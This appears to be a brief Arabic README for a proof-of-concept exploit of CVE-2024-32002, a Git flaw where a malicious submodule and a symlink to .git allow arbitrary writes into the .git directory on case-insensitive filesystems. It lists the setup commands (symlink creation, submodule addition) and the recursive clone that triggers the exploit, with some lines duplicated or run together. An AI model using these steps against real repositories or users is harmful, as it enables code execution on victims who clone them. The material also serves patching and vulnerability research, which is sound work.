
POC لثغرة CVE-2024-32002 يوضح الكتابة الاعتباطية داخل دليل .git.
A POC لـ CVE-2024-32002 توضح الكتابة التعسفية إلى دليل .git.
انظر إلى cve-2024-32002-submodule-aw للمستودع المرتبط بالوحدة الفرعية.
.git..gitmodules يعرّف الوحدة الفرعية الخبيثة.تم إنشاء هذا المستودع في لينكس (WSL2 تحديدًا). هذا مهم، إذ لا يمكن إنشاء المستودع الخبيث إلا على نظام ملفات حساس لحالة الأحرف.
ln -s .git submodule
ملاحظات:
git submodule add --name aw https://github.com/JakobTheDev/cve-2024-32002-submodule-aw.git Submodule/notexists
ملاحظات:
git --version
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-aw.git